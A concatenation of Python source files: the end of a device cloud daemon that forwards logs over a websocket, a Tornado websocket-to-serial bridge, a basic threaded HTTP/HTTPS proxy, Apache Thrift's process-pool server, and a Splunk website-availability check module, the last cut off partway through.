log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
time_sent = int.from_bytes(getxattr(log_path, LOG_ATTR_NAME), sys.byteorder)
except (ValueError, TypeError):
time_sent = 0
# assume send failed and we lost the response if sent more than one hour ago
if not time_sent or curr_time - time_sent > 3600:
logs.append(log_entry)
# excluding most recent (active) log file
return sorted(logs)[:-1]
def log_handler(end_event):
# dont upload any logs for now
if True:
return
log_files = []
last_scan = 0
while not end_event.is_set():
try:
curr_scan = sec_since_boot()
if curr_scan - last_scan > 10:
log_files = get_logs_to_send_sorted()
last_scan = curr_scan
# send one log
curr_log = None
if len(log_files) > 0:
log_entry = log_files.pop() # newest log file
cloudlog.debug(f"athena.log_handler.forward_request {log_entry}")
try:
curr_time = int(time.time())
log_path = os.path.join(SWAGLOG_DIR, log_entry)
setxattr(log_path, LOG_ATTR_NAME, int.to_bytes(curr_time, 4, sys.byteorder))
with open(log_path) as f:
jsonrpc = {
"method": "forwardLogs",
"params": {
"logs": f.read()
},
"jsonrpc": "2.0",
"id": log_entry
}
low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
curr_log = log_entry
except OSError:
pass # file could be deleted by log rotation
# wait for response up to ~100 seconds
# always read queue at least once to process any old responses that arrive
for _ in range(100):
if end_event.is_set():
break
try:
log_resp = json.loads(log_recv_queue.get(timeout=1))
log_entry = log_resp.get("id")
log_success = "result" in log_resp and log_resp["result"].get("success")
cloudlog.debug(f"athena.log_handler.forward_response {log_entry} {log_success}")
if log_entry and log_success:
log_path = os.path.join(SWAGLOG_DIR, log_entry)
try:
setxattr(log_path, LOG_ATTR_NAME, LOG_ATTR_VALUE_MAX_UNIX_TIME)
except OSError:
pass # file could be deleted by log rotation
if curr_log == log_entry:
break
except queue.Empty:
if curr_log is None:
break
except Exception:
cloudlog.exception("athena.log_handler.exception")
def stat_handler(end_event):
while not end_event.is_set():
last_scan = 0
curr_scan = sec_since_boot()
try:
if curr_scan - last_scan > 10:
stat_filenames = list(filter(lambda name: not name.startswith(tempfile.gettempprefix()), os.listdir(STATS_DIR)))
if len(stat_filenames) > 0:
stat_path = os.path.join(STATS_DIR, stat_filenames[0])
with open(stat_path) as f:
jsonrpc = {
"method": "storeStats",
"params": {
"stats": f.read()
},
"jsonrpc": "2.0",
"id": stat_filenames[0]
}
low_priority_send_queue.put_nowait(json.dumps(jsonrpc))
os.remove(stat_path)
last_scan = curr_scan
except Exception:
cloudlog.exception("athena.stat_handler.exception")
time.sleep(0.1)
def ws_proxy_recv(ws, local_sock, ssock, end_event, global_end_event):
while not (end_event.is_set() or global_end_event.is_set()):
try:
data = ws.recv()
local_sock.sendall(data)
except WebSocketTimeoutException:
pass
except Exception:
cloudlog.exception("athenad.ws_proxy_recv.exception")
break
cloudlog.debug("athena.ws_proxy_recv closing sockets")
ssock.close()
local_sock.close()
cloudlog.debug("athena.ws_proxy_recv done closing sockets")
end_event.set()
def ws_proxy_send(ws, local_sock, signal_sock, end_event):
while not end_event.is_set():
try:
r, _, _ = select.select((local_sock, signal_sock), (), ())
if r:
if r[0].fileno() == signal_sock.fileno():
# got end signal from ws_proxy_recv
end_event.set()
break
data = local_sock.recv(4096)
if not data:
# local_sock is dead
end_event.set()
break
ws.send(data, ABNF.OPCODE_BINARY)
except Exception:
cloudlog.exception("athenad.ws_proxy_send.exception")
end_event.set()
cloudlog.debug("athena.ws_proxy_send closing sockets")
signal_sock.close()
cloudlog.debug("athena.ws_proxy_send done closing sockets")
def ws_recv(ws, end_event):
last_ping = int(sec_since_boot() * 1e9)
while not end_event.is_set():
try:
opcode, data = ws.recv_data(control_frame=True)
if opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
if opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
recv_queue.put_nowait(data)
elif opcode == ABNF.OPCODE_PING:
last_ping = int(sec_since_boot() * 1e9)
Params().put("LastAthenaPingTime", str(last_ping))
except WebSocketTimeoutException:
ns_since_last_ping = int(sec_since_boot() * 1e9) - last_ping
if ns_since_last_ping > RECONNECT_TIMEOUT_S * 1e9:
cloudlog.exception("athenad.ws_recv.timeout")
end_event.set()
except Exception:
cloudlog.exception("athenad.ws_recv.exception")
end_event.set()
def ws_send(ws, end_event):
while not end_event.is_set():
try:
try:
data = send_queue.get_nowait()
except queue.Empty:
data = low_priority_send_queue.get(timeout=1)
for i in range(0, len(data), WS_FRAME_SIZE):
frame = data[i:i+WS_FRAME_SIZE]
last = i + WS_FRAME_SIZE >= len(data)
opcode = ABNF.OPCODE_TEXT if i == 0 else ABNF.OPCODE_CONT
ws.send_frame(ABNF.create_frame(frame, opcode, last))
except queue.Empty:
pass
except Exception:
cloudlog.exception("athenad.ws_send.exception")
end_event.set()
def backoff(retries):
return random.randrange(0, min(128, int(2 ** retries)))
def main():
try:
set_core_affinity([0, 1, 2, 3])
except Exception:
cloudlog.exception("failed to set core affinity")
params = Params()
dongle_id = params.get("DongleId", encoding='utf-8')
UploadQueueCache.initialize(upload_queue)
ws_uri = ATHENA_HOST + "/ws/v2/" + dongle_id
api = Api(dongle_id)
conn_retries = 0
while 1:
try:
cloudlog.event("athenad.main.connecting_ws", ws_uri=ws_uri)
ws = create_connection(ws_uri,
cookie="jwt=" + api.get_token(),
enable_multithread=True,
timeout=30.0)
cloudlog.event("athenad.main.connected_ws", ws_uri=ws_uri)
conn_retries = 0
cur_upload_items.clear()
handle_long_poll(ws)
except (KeyboardInterrupt, SystemExit):
break
except (ConnectionError, TimeoutError, WebSocketException):
conn_retries += 1
params.delete("LastAthenaPingTime")
except socket.timeout:
params.delete("LastAthenaPingTime")
except Exception:
cloudlog.exception("athenad.main.exception")
conn_retries += 1
params.delete("LastAthenaPingTime")
time.sleep(backoff(conn_retries))
if __name__ == "__main__":
main()
|
tornadoWebControl.py
|
import tornado.web
import tornado.websocket
import tornado.ioloop
import os
import sys
import serial
import time
import threading
#host=os.environ['IP']
#port=os.environ['PORT']
host="*"
port="8080"
#PORT = "loop://logging=debug"
PORT = "/dev/ttyACM0"
TIMEOUT = 1
class Application(tornado.web.Application):
def __init__(self):
handlers = [
(r"/", MainHandler),
(r"/sliderssocket", SlidersSocket),
]
settings = dict(
cookie_secret="__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__",
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
xsrf_cookies=True,
)
tornado.web.Application.__init__(self, handlers, **settings)
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.render("index.html");
class SlidersSocket(tornado.websocket.WebSocketHandler):
def __init__(self, app, request, **kwargs):
tornado.websocket.WebSocketHandler.__init__(self, app, request, **kwargs)
self.serial = serial.serial_for_url(PORT, timeout=TIMEOUT)
self.alive = True
self.thread_read = threading.Thread(target=self.reader)
self.thread_read.setDaemon(True)
self.thread_read.setName('read serial')
self.thread_read.start()
def reader(self):
"""loop forever """
while self.alive:
try:
data = self.serial.readline() # read one line, blocking
if data:
self.write_message( data )
except:
sys.stderr.write('ERROR: %s\n' % sys.exc_info()[0] )
raise
self.alive = False
def open(self):
print "WebSocket opened"
def on_message(self, message):
#self.write_message(u"Sending to Serial port: <" + message +">")
self.serial.write(message+'\n')
def on_close(self):
print "WebSocket closed"
if __name__ == "__main__":
app = Application()
app.listen(port, host)
tornado.ioloop.IOLoop.instance().start()
|
proxy-server.py
|
import socket
from threading import Thread
import requests
serverSocket = socket.socket() # Create socket
localHostIp = "0.0.0.0" # work for all ips of the server
port = 2874
# Reserve port
serverSocket.bind((localHostIp, port))
# Listen to up to 15 client connections
serverSocket.listen(15)
allThreads = set() # Store records of all threads
buffer = 2048 # Buffer size
def handle_client_connection(client_socket, client_address):
client_header = ""
while True:
data = client_socket.recv(buffer) # Receive request from client
try:
client_header += data.decode("utf-8")
except UnicodeDecodeError:
break
if len(data) < buffer:
break
list_header = list(map(str, client_header.strip().split("\r\n"))) # Split headers
# Handle either HTTP or HTTPS request
if list(map(str, list_header[0].split(" ")))[0].strip() == "GET":
handle_http_request(client_socket, list_header)
else:
handle_https_request(client_socket, client_header, list_header)
def handle_http_request(client_socket, list_header):
web_request = requests.get(list(map(str, list_header[0].split(" ")))[1]) # Get
# 200 OK
if web_request.status_code == 200:
response = "HTTP/1.1 200 OK\r\nProxy-Agent: simple-proxy-server\r\n\r\n"
client_socket.send(response.encode("utf-8"))
client_socket.sendall(web_request.text.encode("utf-8"))
else:
# 404 Not Found
response = "HTTP/1.1 404 Not Found\r\nProxy-Agent: simple-proxy-server\r\n\r\Website not Found\r\n"
client_socket.send(response.encode("utf-8"))
def handle_https_request(client_socket, client_header, list_header):
web_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
web_host = list(map(str, list_header[0].split(" ")))[1]
web_host = list(map(str, web_host.split(":")))[0]
except IndexError:
print("Index error while fetching https request")
return
try:
web_host_ip = socket.gethostbyname(web_host)
except socket.gaierror:
print("Unknown host error while fetching https request")
return
# 200 OK
web_server_socket.connect((web_host_ip, 443))
response = "HTTP/1.1 200 Connection Established\r\nProxy-Agent: simple-proxy-server\r\n\r\n"
client_socket.send(response.encode("utf-8"))
transfer_thread = Thread(target=client_to_server_transfer, args=(client_socket, web_server_socket))
transfer_thread.setDaemon(True)
transfer_thread.start()
while True:
server_data = web_server_socket.recv(buffer)
client_socket.send(server_data)
if len(server_data) < 1:
break
def client_to_server_transfer(client_socket, web_server_socket):
while True:
client_data = client_socket.recv(buffer)
web_server_socket.send(client_data)
if len(client_data) < 1:
break
while True:
client_socket, client_address = serverSocket.accept() # Connection with client
# Create new thread for handling client requests
print("Connection accepted from ", client_address)
thread = Thread(target=handle_client_connection, args=(client_socket, client_address))
allThreads.add(thread) # Add thread to the list
thread.start()
|
TProcessPoolServer.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import collections
logger = logging.getLogger(__name__)
from multiprocessing import Process, Value, Condition, reduction
from .TServer import TServer
from thrift.transport.TTransport import TTransportException
class TProcessPoolServer(TServer):
"""Server with a fixed size pool of worker subprocesses to service requests
Note that if you need shared state between the handlers - it's up to you!
Written by Dvir Volk, doat.com
"""
def __init__(self, *args):
TServer.__init__(self, *args)
self.numWorkers = 10
self.workers = []
self.isRunning = Value('b', False)
self.stopCondition = Condition()
self.postForkCallback = None
def setPostForkCallback(self, callback):
if not isinstance(callback, collections.Callable):
raise TypeError("This is not a callback!")
self.postForkCallback = callback
def setNumWorkers(self, num):
"""Set the number of worker threads that should be created"""
self.numWorkers = num
def workerProcess(self):
"""Loop getting clients from the shared queue and process them"""
if self.postForkCallback:
self.postForkCallback()
while self.isRunning.value:
try:
client = self.serverTransport.accept()
if not client:
continue
self.serveClient(client)
except (KeyboardInterrupt, SystemExit):
return 0
except Exception as x:
logger.exception(x)
def serveClient(self, client):
"""Process input/output from a client for as long as possible"""
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransportException as tx:
pass
except Exception as x:
logger.exception(x)
itrans.close()
otrans.close()
def serve(self):
"""Start workers and put into queue"""
# this is a shared state that can tell the workers to exit when False
self.isRunning.value = True
# first bind and listen to the port
self.serverTransport.listen()
# fork the children
for i in range(self.numWorkers):
try:
w = Process(target=self.workerProcess)
w.daemon = True
w.start()
self.workers.append(w)
except Exception as x:
logger.exception(x)
# wait until the condition is set by stop()
while True:
self.stopCondition.acquire()
try:
self.stopCondition.wait()
break
except (SystemExit, KeyboardInterrupt):
break
except Exception as x:
logger.exception(x)
self.isRunning.value = False
def stop(self):
self.isRunning.value = False
self.stopCondition.acquire()
self.stopCondition.notify()
self.stopCondition.release()
|
web_ping.py
|
"""
This module defines the Website Monitoring web_ping modular input.
"""
import os
import sys
path_to_mod_input_lib = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'modular_input.zip')
sys.path.insert(0, path_to_mod_input_lib)
from modular_input import Field, ModularInput, URLField, DurationField, IntegerField, BooleanField, RangeField
from modular_input.shortcuts import forgive_splunkd_outages
from modular_input.secure_password import get_secure_password
from modular_input.server_info import ServerInfo
from splunk.models.field import Field as ModelField
from splunk.models.field import IntField as ModelIntField
import splunk
import re
import hashlib
import time
import json
import threading
import logging
import socket
from six.moves.urllib.request import getproxies
from six import text_type, binary_type
from website_monitoring_app import socks
from website_monitoring_app import requests
from website_monitoring_app.requests_ntlm import HttpNtlmAuth
from website_monitoring_app.expiring_dict import ExpiringDict
# Disable the SSL certificate warning
# http://lukemurphey.net/issues/1390
# We don't support SSL certificate checking at this point because I haven't found a good way to
# include the SSL cert libraries into a Splunk app.
from website_monitoring_app.requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class NTLMAuthenticationValueException(Exception):
"""
This class is used to communicate that the NTLM authentication information is invalid.
"""
pass
class Timer(object):
"""
This class is used to time durations.
"""
def __init__(self, verbose=False):
self.verbose = verbose
def __enter__(self):
self.start = time.time()
return self
def __exit__(self, *args):
self.end = time.time()
self.secs = self.end - self.start
self.msecs = self.secs * 1000 # millisecs
class WebPing(ModularInput):
"""
The web ping modular input connects to a website to determine if the site is operational and
tracks the time it takes to respond.
"""
PARSE_URL_RE = re.compile(r"http[s]?[:]//(.*)", re.IGNORECASE)
HTTP_AUTH_BASIC = 'basic'
HTTP_AUTH_DIGEST = 'digest'
HTTP_AUTH_NTLM = 'ntlm'
HTTP_AUTH_NEGOTIATE = 'negotiate'
HTTP_AUTH_NONE = None
DEFAULT_THREAD_LIMIT = 200
# The following define which secure password entry to use for the proxy
PROXY_PASSWORD_REALM = 'website_monitoring_app_proxy'
PROXY_PASSWORD_USERNAME = 'IN_CONF_FILE'
# This stores the default app config information
default_app_config = None
class Result(object):
"""
The results object designates the results of connecting to a website.
"""
def __init__(self, request_time, response_code, timed_out, url, response_size=None,
response_md5=None, response_sha224=None, has_expected_string=None,
response_body=None, exceeded_redirects=None, return_body=False,
timeout=0, max_redirects=-1, warning_threshold=None, error_threshold=None,
headers=None):
self.request_time = request_time
self.response_code = response_code
self.timed_out = timed_out
self.url = url
self.response_size = response_size
self.response_md5 = response_md5
self.response_sha224 = response_sha224
self.has_expected_string = has_expected_string
self.response_body = response_body
self.exceeded_redirects = exceeded_redirects
self.return_body = return_body
self.timeout = timeout
self.max_redirects = max_redirects
self.warning_threshold = warning_threshold
self.error_threshold = error_threshold
self.headers = headers
def __init__(self, timeout=30, thread_limit=None):
scheme_args = {'title': "Website Availability Check",
'description': "Connects to a website in order to obtain performance statistics",
'use_external_validation': "true",
'streaming_mode': "xml",
'use_single_instance': "true"}
args = [
Field("title", "Title", "A short description (typically just the domain name)", empty_allowed=False),
URLField("url", "URL", "The URL to connect to (must be be either HTTP or HTTPS protocol)", empty_allowed=False, require_https_on_cloud=True),
DurationField("interval", "Interval", "The interval defining how often to perform the check; can include time units (e.g. 15m for 15 minutes, 8h for 8 hours)", empty_allowed=False),
Field("configuration", "Configuration", "Defines a specific proxy configuration to use (in website_monitoring.spec) if not using the default; only used if you want to have multiple proxy servers", none_allowed=True, empty_allowed=True),
Field("client_certificate", "Client Certificate Path", "Defines the path to the client certificate (if the website requires client SSL authentication)", none_allowed=True, empty_allowed=True),
Field("client_certificate_key", "Client Certificate Key Path", "Defines the path to the client certificate key (necessary of the key is in a separate file from the certificate)", none_allowed=True, empty_allowed=True),
Field("username", "Username", "The username to use for authenticating (only HTTP authentication supported)", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
Field("password", "Password", "The password to use for authenticating (only HTTP authentication supported)", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
Field("user_agent", "User Agent", "The user-agent to use when communicating with the server", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
Field("should_contain_string", "String match", "A string that should be present in the content", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
IntegerField("max_redirects", "Maximum Redirects", "The maximum number of redirects to follow (-1 or blank for unlimited, 0 to not follow any redirects)", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
IntegerField("timeout", "Timeout", "The maximum number of seconds to wait for a response", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
BooleanField("return_body", "Return response body", "If checked, will return the response body", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
BooleanField("return_headers", "Return headers", "If checked, will return the response headers", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
IntegerField("warning_threshold", "Warning Threshold", "The number of milliseconds above which a response time is considered a 'Warning'", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False),
IntegerField("error_threshold", "Error Threshold", "The number of milliseconds above which a response time is considered 'Failed'", none_allowed=True, empty_allowed=True, required_on_create=False, required_on_edit=False)
]
ModularInput.__init__(self, scheme_args, args, logger_name='web_availability_modular_input', logger_level=logging.INFO)
if timeout > 0:
self.timeout = timeout
else:
self.timeout = 30
if thread_limit is None:
self.thread_limit = WebPing.DEFAULT_THREAD_LIMIT
else:
self.thread_limit = thread_limit
self.threads = {}
# This will store a cache for proxy configs for 10 minutes
self.app_configs = ExpiringDict(600)
@classmethod
def resolve_proxy_type(cls, proxy_type, logger=None):
"""
Determine the type of the proxy to be used based on the string.
Argument:
proxy_type -- A string representing the proxy type (e.g. "socks4")
logger -- The logger object to use for logging
"""
# Make sure the proxy string is not none
if proxy_type is None:
return None
# Prepare the string so that the proxy type can be matched more reliably
proxy_type_processed = proxy_type.strip().lower()
if proxy_type_processed == "socks4":
return socks.PROXY_TYPE_SOCKS4
elif proxy_type_processed == "socks5":
return socks.PROXY_TYPE_SOCKS5
elif proxy_type_processed == "http":
return socks.PROXY_TYPE_HTTP
elif proxy_type_processed == "":
return None
else:
if logger:
logger.warn("Proxy type is not recognized: %s", proxy_type)
return None
@classmethod
def determine_auth_type(cls, url, proxies=None, timeout=None, cert=None, logger=None, ):
"""
Determine the authentication type that is appropriate to authenticate to the given
web-server.
Argument:
url -- The url to connect to. This object ought to be an instance derived from using urlparse
proxies -- The proxies to use
timeout -- The amount of time to quit waiting on a connection
cert -- A tuple representing the certificate to use
logger -- The logger object to use for logging
"""
# Perform a request to the URL and see what authentication method is required
http = requests.get(url.geturl(), proxies=proxies, timeout=timeout, cert=cert,
verify=False)
# Find the authentication header irrespective of case
auth_header_value = None
for header, value in http.headers.items():
if header.lower() == 'www-authenticate':
auth_header_value = value
break
# Determine if the authentication header is present and use it to determine the
# authentication type
if auth_header_value is not None:
# Handle the pesky cases where a comma separated value is provided in the header
# for NTLM negotiation (like "negotiate, ntlm")
if 'ntlm' in auth_header_value.lower():
return cls.HTTP_AUTH_NTLM
# Otherwise, check the HTTP header for the authentication header
m = re.search('^([a-zA-Z0-9]+)', auth_header_value)
auth_type = m.group(1)
return auth_type.lower()
# No authentication header is present
else:
if logger:
logger.warn("Unable to determine authentication type (no www-authenticate header); will default to basic authentication")
return cls.HTTP_AUTH_NONE
@classmethod
def create_auth_for_request(cls, auth_type, username, password, logger=None):
"""
Create the auth object for the requests library so that any HTTP authentication is taken care of.
Argument:
auth_type -- A string indicating the type of authentication require (e.g. "digest")
username -- The password to use for authentication
password -- The username to use for authentication
logger -- The logger object to use for logging
"""
# No authentication
if auth_type == cls.HTTP_AUTH_NONE:
return None
# Digest authentication
elif auth_type == cls.HTTP_AUTH_DIGEST:
return requests.auth.HTTPDigestAuth(username, password)
# NTLM authentication
elif auth_type == cls.HTTP_AUTH_NTLM:
try:
return HttpNtlmAuth(username, password)
except ValueError as e:
raise NTLMAuthenticationValueException(e)
# Basic authentication
elif auth_type == cls.HTTP_AUTH_BASIC:
return requests.auth.HTTPBasicAuth(username, password)
# Unknown authentication type
else:
if logger:
logger.warn('Unknown type of authentication requested, auth_type=%s', auth_type)
return (username, password)
@classmethod
def isExceptionForTimeout(cls, exception):
"""
Determines if the given exception is due to a timeout
Argument:
exception -- The exception
"""
if exception.args is not None and len(exception.args) > 0 and hasattr(exception.args[0], 'reason') and hasattr(exception.args[0].reason, 'errno') and exception.args[0].reason.errno in [60, 61, 10060, 10061, 100]:
return True
else:
# Check the stacktrace to see if any of the exception indicate that the issue is a timeout
count = 0
while exception is not None and count < 10:
# Try to parse out the errno from the message since the errno is oftentimes
# unavailable in the exception chain
if re.match(".*((\[Errno ((51)|(60)|(61)|(10060)|(10061))\])|(timed out)).*", str(exception)):
return True
# See if the exception has a reason code indicating a connection failure
if hasattr(exception, 'errno') and exception.errno in [51, 60, 61, 10060, 10061, 110]:
return True
# Get the next exception
if hasattr(exception, 'args') and exception.args is not None and len(exception.args) > 0 and isinstance(exception.args[0], Exception):
exception = exception.args[0]
elif hasattr(exception, 'reason') and exception.reason is not None:
exception = exception.reason
else:
exception = None
count = count + 1
return False
@classmethod
def ping(cls, url, username=None, password=None, timeout=30, proxy_type=None,
proxy_server=None, proxy_port=None, proxy_user=None, proxy_password=None, proxy_ignore=None,
client_certificate=None, client_certificate_key=None, user_agent=None, max_redirects=None,
logger=None, should_contain_string=None, response_body_length=0, raise_all=False,
warning_threshold=None, error_threshold=None, return_headers=False, fips_mode=False):
"""
Perform a ping to a website. Returns a WebPing.Result instance.
Argument:
url -- The url to connect to. This object ought to be an instance derived from using urlparse.
username -- The password to use for authentication
password -- The username to use for authentication
timeout -- The amount of time to quit waiting on a connection.
proxy_type -- The type of the proxy server (must be one of: socks4, socks5, http)
proxy_server -- The proxy server to use.
proxy_port -- The port on the proxy server to use.
proxy_user -- The proxy server to use.
proxy_password -- The port on the proxy server to use.
proxy_ignore -- The list of domains to not use the proxy server for.
client_certificate -- The path to the client certificate to use.
client_certificate_key -- The path to the client key to use.
user_agent -- The string to use for the user-agent
logger -- The logger object to use for logging
should_contain_string -- A string that is expected in the response
max_redirects -- The maximum number of redirects to follow
response_body_length -- How much of the response body to return. -1 for unlimited, 0 to disable.
raise_all -- Raise all exceptions even if it is for possibly recoverable issues.
warning_threshold -- If the response time is above this number (in ms), it is considered a 'Warning'
error_threshold -- If the response time is above this number (in ms), it is concidered an 'Error' (Failed)
return_headers -- If true, include the response headers in the output
fips_mode -- If true, has functions will be skipped that are not allowed on FIPS hosts
"""
if logger:
logger.info('Performing ping, url="%s" timeout=%r', url.geturl(), timeout)
# Disable the use of the proxy variables
if proxy_ignore is not None:
os.environ['NO_PROXY'] = proxy_ignore
if logger:
logger.debug('Proxies discovered from the environment, proxies="%r"', getproxies())
# Determine which type of proxy is to be used (if any)
resolved_proxy_type = cls.resolve_proxy_type(proxy_type, logger=logger)
# Set should_contain_string to none if it is blank since this means it really doesn't have
# a value
if should_contain_string is not None and len(should_contain_string.strip()) == 0:
should_contain_string = None
# Make sure that a timeout is not None since that is infinite
if timeout is None:
timeout = 30
# Make sure that the max_redirects is None or >= 0
if max_redirects is not None and max_redirects < 0:
max_redirects = None
if logger and max_redirects is not None:
logger.debug("max_redirects = %d", max_redirects)
# Make sure that warning_threshold and error_threshold are positive or None
if warning_threshold is not None and warning_threshold < 0:
warning_threshold = None
if error_threshold is not None and error_threshold < 0:
error_threshold = None
# Setup the proxy info if so configured
proxies = {}
if resolved_proxy_type is not None and proxy_server is not None and len(proxy_server.strip()) > 0:
if proxy_type == "http":
# Use the username and password if provided
if proxy_password is not None and proxy_user is not None:
proxies = {
"http": "http://" + proxy_user + ":" + proxy_password + "@" + proxy_server + ":" + str(proxy_port),
"https": "http://" + proxy_user + ":" + proxy_password + "@" + proxy_server + ":" + str(proxy_port)
}
else:
proxies = {
"http": "http://" + proxy_server + ":" + str(proxy_port),
"https": "http://" + proxy_server + ":" + str(proxy_port)
}
else:
socks.setdefaultproxy(resolved_proxy_type, proxy_server, int(proxy_port))
socket.socket = socks.socksocket
if logger:
logger.debug("Using socks proxy server=%s, port=%s", proxy_server, proxy_port)
else:
# No proxy is being used
pass
# Setup the client certificate parameter
if client_certificate is not None and client_certificate_key is not None:
cert = (client_certificate, client_certificate_key)
elif client_certificate is not None:
cert = client_certificate
else:
cert = None
if logger and cert is not None:
logger.debug("Using client certificate %s", cert)
request_time = 0
response_code = 0
response_md5 = None
response_sha224 = None
timed_out = False
response_size = None
has_expected_string = None
response_body = None
exceeded_redirects = None
response_headers = None
# Setup the headers as necessary
headers = {}
if user_agent is not None:
if logger:
logger.debug("Setting user-agent=%s", user_agent)
headers['User-Agent'] = user_agent
# Make an auth object if necessary
auth = None
auth_type = None
if username is not None and password is not None:
# Determine the auth type
try:
auth_type = cls.determine_auth_type(url, proxies=proxies, timeout=timeout, cert=cert,
logger=logger)
except Exception as e:
auth_type = None
if logger:
logger.exception("Unable to determine authentication type")
# Don't allow the use of NTLM on a host in FIPS mode since NTLM uses MD4 which is a
# weak algorithm
if auth_type == cls.HTTP_AUTH_NTLM and fips_mode:
if logger:
logger.warn("Authentication type was automatically identified but will not be used since it uses a weak hash algorithm which is not allowed on this host since it is running in FIPS mode; auth_type=%s", auth_type)
auth_type = cls.HTTP_AUTH_NONE
# The authentication type could not be determined. However, we know that
# authentication is required since a username and password was provided.
# Default to HTTP basic authentication.
elif auth_type == cls.HTTP_AUTH_NONE:
auth_type = cls.HTTP_AUTH_BASIC
if logger:
logger.info("Authentication type could not be automatically discovered; auth_type=%s", auth_type)
elif logger is not None:
logger.debug("Discovered auth_type=%s", auth_type)
# Get the authentication class for request
auth = cls.create_auth_for_request(auth_type, username, password, logger)
try:
# Perform the request
with Timer() as timer:
# Make the client
# http = requests.get(url.geturl(), proxies=proxies, timeout=timeout, cert=cert, verify=False, auth=auth, headers=headers)
session = requests.Session()
if max_redirects is not None:
session.max_redirects = max_redirects
http = session.get(url.geturl(), proxies=proxies, timeout=timeout, cert=cert, verify=False, auth=auth, headers=headers)
# Prep the content for hashing; we might need to convert it for Python 3
if isinstance(http.text, binary_type):
http_text = http.text
else:
http_text = http.text.encode('utf-8')
# Get the hash of the content
if not fips_mode:
response_md5 = hashlib.md5(http_text).hexdigest()
response_sha224 = hashlib.sha224(http_text).hexdigest()
# Determine if the expected string is in the content
if should_contain_string is not None:
has_expected_string = should_contain_string in http.text
# Get the size of the content
response_size = len(http.text)
if response_body_length < 0:
response_body = http.text
elif response_body_length > 0:
response_body = http.text[:response_body_length]
response_code = http.status_code
request_time = timer.msecs
# Get the headers
if return_headers:
response_headers = http.headers
# Handle time outs
except requests.exceptions.Timeout:
# Note that the connection timed out
timed_out = True
except requests.exceptions.SSLError as e:
if logger:
logger.error("An SSL exception was thrown when executing a web request against url=%s: " + str(e), url.geturl())
except requests.exceptions.ConnectionError as e:
timed_out = WebPing.isExceptionForTimeout(e)
if not timed_out and logger:
logger.exception("A connection exception was thrown when executing a web request against url=%s, this can happen if the domain name, IP address is invalid or if network connectivity is down or blocked by a firewall; see help_url=http://lukemurphey.net/projects/splunk-website-monitoring/wiki/Troubleshooting", url.geturl())
except socks.GeneralProxyError:
# This may be thrown if the user configured the proxy settings incorrectly
if logger:
logger.exception("An error occurred when attempting to communicate with the proxy for url=%s", url.geturl())
except requests.exceptions.TooManyRedirects as e:
exceeded_redirects = True
if logger:
logger.exception("The maximum number of redirects (%d) were exceeded for url=%s", max_redirects, url.geturl())
except Exception as e:
if raise_all:
raise e
if logger:
logger.exception("A general exception was thrown when executing a web request for url=%s", url.geturl())
# Finally, return the result
return cls.Result(request_time, response_code, timed_out, url.geturl(), response_size, response_md5, response_sha224, has_expected_string, response_body, exceeded_redirects, timeout=timeout, max_redirects=max_redirects, warning_threshold=warning_threshold, error_threshold=error_threshold, headers=response_headers)
def output_result(self, result, stanza, title, index=None, source=None, sourcetype=None,
host=None,unbroken=True, close=True, proxy_server=None, proxy_port=None,
proxy_user=None, proxy_type=None, out=sys.stdout):
"""
Create a string representing the event.
Argument:
result -- A result instance from a call to WebPing.ping
stanza -- The stanza used for the input
sourcetype -- The sourcetype
source -- The source field value
index -- The index to send the event to
unbroken --
close --
out -- The stream to send the event to (defaults to standard output)
"""
data = {
'response_code': result.response_code if result.response_code > 0 else '',
'total_time': round(result.request_time, 2) if result.request_time > 0 else '',
'request_time': round(result.request_time, 2) if result.request_time > 0 else '',
'timed_out': result.timed_out,
'title': title,
'url': result.url,
'timeout': result.timeout
}
# Add the response headers if necessary
if result.headers is not None:
for header in result.headers:
data['header_' + header] = result.headers[header]
# Log proxy server information
if proxy_server is not None:
data['proxy_server'] = proxy_server
data['proxy_type'] = proxy_type
if proxy_user is not None and len(proxy_user) > 0:
data['proxy_user'] = proxy_user
if proxy_port is not None:
data['proxy_port'] = proxy_port
# Add the MD5 of the response of available
if result.response_md5 is not None:
data['content_md5'] = result.response_md5
# Add the SHA-224 of the response of available
if result.response_sha224 is not None:
data['content_sha224'] = result.response_sha224
# Add the MD5 of the response of available
if result.response_size is not None:
data['content_size'] = result.response_size
# Add the variable noting if the expected string was present
if result.has_expected_string is not None:
data['has_expected_string'] = str(result.has_expected_string).lower()
# Add the variable noting if the maximum number of redirects was exceeded
if result.exceeded_redirects is not None:
data['exceeded_redirects'] = result.exceeded_redirects
# Add the variable indicating what the maximum number of redirects allowed was
if result.max_redirects is not None:
